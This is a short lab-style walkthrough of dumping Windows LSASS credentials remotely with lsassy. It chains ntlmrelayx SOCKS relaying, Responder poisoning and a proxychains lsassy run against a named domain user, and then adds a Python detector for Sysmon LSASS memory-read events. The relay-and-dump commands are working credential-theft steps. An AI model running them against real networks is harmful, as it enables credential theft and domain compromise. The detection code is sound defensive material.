Lsassy
Use lsassy to retrieve the credentials stored in the LSASS process
Domain account information, including credential material, is cached in the LSASS process, so dumping this process can yield additional domain accounts and privileges.
Lsassy lets you dump LSASS remotely, which is far more convenient than running procdump, downloading the dump file and parsing it locally with pypykatz or mimikatz: it performs the painful steps (dumping and parsing the LSASS content) for you, and it transfers only the useful part of the dump, which shortens the transfer time. (lsassy is also available as a CrackMapExec (cme) module.)
Install LSASSY
python3 -m pip install lsassy
Run ntlmrelayx.py and wait for a connection from fernando.alonzo
sudo ntlmrelayx.py -socks -smb2support -tf unsigned_smb.txt

Run Responder
sudo responder -I enp0s3
Run LSASSY
proxychains lsassy --no-pass -d NORTH -u fernando.alonzo 192.168.56.22
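Every remote LSASS dumper, lsassy's MiniDump-based methods included, has to open a handle on lsass.exe with memory-read rights before it can copy anything, which is what a defender watches for. The following detection is an added example, not part of this guide or of lsassy: it scans constructed Sysmon Event ID 10 (ProcessAccess) JSON records for memory-read access to lsass.exe from images outside an allowlist; the allowlist and the sample records are assumptions to tune per environment.

```python
"""Flag handle opens on lsass.exe that carry memory-read rights.

Remote LSASS dumpers must open the process with PROCESS_VM_READ before
copying its memory, so Sysmon Event ID 10 (ProcessAccess) is the hook.
"""
import json

# Win32 process access right (real constant); it is set in the common
# dumping masks (0x1010, 0x1438, 0x1FFFFF), so test the bit, not a list.
PROCESS_VM_READ = 0x0010

# Images expected to read LSASS memory; an assumed list, tune per environment.
ALLOWED_SOURCES = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

def is_suspicious_lsass_access(event: dict) -> bool:
    """True when a record opens lsass.exe with read rights from an unexpected image."""
    if event.get("EventID") != 10:
        return False
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    if not granted & PROCESS_VM_READ:
        return False
    return event.get("SourceImage", "").lower() not in ALLOWED_SOURCES

def scan(json_lines):
    """Return (SourceImage, GrantedAccess) for each suspicious JSON-line record."""
    hits = []
    for line in json_lines:
        event = json.loads(line)
        if is_suspicious_lsass_access(event):
            hits.append((event["SourceImage"], event["GrantedAccess"]))
    return hits

# Constructed sample records, not captured from a real host.
SAMPLE_RECORDS = [
    r'{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\rundll32.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}',
    r'{"EventID": 10, "SourceImage": "C:\\Program Files\\Windows Defender\\MsMpEng.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}',
    r'{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1000"}',
    r'{"EventID": 10, "SourceImage": "C:\\Windows\\explorer.exe", "TargetImage": "C:\\Windows\\System32\\notepad.exe", "GrantedAccess": "0x1FFFFF"}',
]

if __name__ == "__main__":
    for source, access in scan(SAMPLE_RECORDS):
        print(f"ALERT lsass.exe opened with {access} by {source}")
```

Only the rundll32.exe record is reported: the Defender engine is allowlisted, the svchost.exe handle carries no read right, and the last record does not target lsass.exe.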